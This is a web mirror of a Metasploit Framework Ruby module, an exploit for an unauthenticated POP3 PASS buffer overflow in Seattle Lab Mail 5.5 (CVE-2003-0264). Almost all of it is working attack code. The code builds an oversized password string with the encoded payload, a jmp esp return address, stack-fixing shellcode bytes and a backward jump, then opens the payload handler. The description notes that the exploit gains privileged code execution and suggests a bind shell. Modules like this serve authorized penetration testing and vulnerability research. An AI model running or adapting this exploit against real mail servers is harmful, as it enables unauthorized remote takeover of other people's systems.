Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/pop3/seattlelab_pass.rb
19715 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = GreatRanking
8
9
include Msf::Exploit::Remote::Tcp
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => 'Seattle Lab Mail 5.5 POP3 Buffer Overflow',
16
'Description' => %q{
17
There exists an unauthenticated buffer overflow vulnerability
18
in the POP3 server of Seattle Lab Mail 5.5 when sending a password
19
with excessive length.
20
21
Successful exploitation should not crash either the
22
service or the server; however, after initial use the
23
port cannot be reused for successive exploitation until
24
the service has been restarted. Consider using a command
25
execution payload following the bind shell to restart
26
the service if you need to reuse the same port.
27
28
The overflow appears to occur in the debugging/error reporting
29
section of the slmail.exe executable, and there are multiple
30
offsets that will lead to successful exploitation. This exploit
31
uses 2606, the offset that creates the smallest overall payload.
32
The other offset is 4654.
33
34
The return address is overwritten with a "jmp esp" call from the
35
application library SLMFC.DLL found in %SYSTEM%\system32\. This
36
return address works against all version of Windows and service packs.
37
38
The last modification date on the library is dated 06/02/99. Assuming
39
that the code where the overflow occurs has not changed in some time,
40
prior version of SLMail may also be vulnerable with this exploit. The
41
author has not been able to acquire older versions of SLMail for
42
testing purposes. Please let us know if you were able to get this
43
exploit working against other SLMail versions.
44
},
45
'Author' => 'stinko',
46
'License' => MSF_LICENSE,
47
'References' => [
48
['CVE', '2003-0264'],
49
['OSVDB', '11975'],
50
['BID', '7519'],
51
],
52
'Privileged' => true,
53
'DefaultOptions' => {
54
'EXITFUNC' => 'thread',
55
},
56
'Payload' => {
57
'Space' => 600,
58
'BadChars' => "\x00\x0a\x0d\x20",
59
'MinNops' => 100,
60
},
61
'Platform' => 'win',
62
'Targets' => [
63
['Windows NT/2000/XP/2003 (SLMail 5.5)', { 'Ret' => 0x5f4a358f, 'Offset' => 2606 } ]
64
],
65
'DisclosureDate' => '2003-05-07',
66
'DefaultTarget' => 0,
67
'Notes' => {
68
'Reliability' => UNKNOWN_RELIABILITY,
69
'Stability' => UNKNOWN_STABILITY,
70
'SideEffects' => UNKNOWN_SIDE_EFFECTS
71
}
72
)
73
)
74
75
register_options(
76
[
77
Opt::RPORT(110)
78
]
79
)
80
end
81
82
def exploit
83
connect
84
85
print_status("Trying #{target.name} using jmp esp at #{"%.8x" % target.ret}")
86
87
banner = sock.get_once || ''
88
if banner !~ /^\+OK POP3 server (.*) ready/
89
print_error("POP3 server does not appear to be running")
90
return
91
end
92
93
sock.put("USER #{rand_text_alphanumeric(10)}\r\n")
94
banner = sock.get_once
95
if banner !~ /^\+OK (.*) welcome here/
96
print_error("POP3 server rejected username")
97
return
98
end
99
100
request = "PASS " + rand_text_alphanumeric(target['Offset'] - payload.encoded.length)
101
request << payload.encoded
102
request << [target.ret].pack('V')
103
request << "\x81\xc4\xff\xef\xff\xff\x44" # fix the stack
104
request << "\xe9\xcb\xfd\xff\xff" # go back 560 bytes
105
request << rand_text_alphanumeric(512) # cruft
106
request << "\r\n"
107
108
sock.put(request)
109
110
handler
111
disconnect
112
end
113
end
114
115